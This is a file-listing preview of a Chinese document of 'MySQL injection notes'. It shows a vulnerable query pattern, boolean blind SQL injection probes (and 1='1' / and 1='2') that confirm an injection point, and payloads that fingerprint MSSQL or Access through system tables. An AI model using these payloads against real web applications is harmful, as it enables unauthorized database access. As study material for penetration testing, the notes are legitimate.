文件名称:MySQL注入笔记
文件大小:157KB
文件格式:DOCX
更新时间:2018-08-18 16:18:55
MySQL
MYSQL注入 select * from user_t where usr = '$username' 盲注 判断是否有注入 admin‘ and 1=’1 返回正常 admin’ and 1=’2 返回错误 表明存在注入 判断数据库系统 and (select count(*) from sysobjects)>0 mssql,在web环境下可以正常读取 and (select count(*) from msysobjects)>0 access,access在系统表【msysobiects】中,但在web中会显示没有权限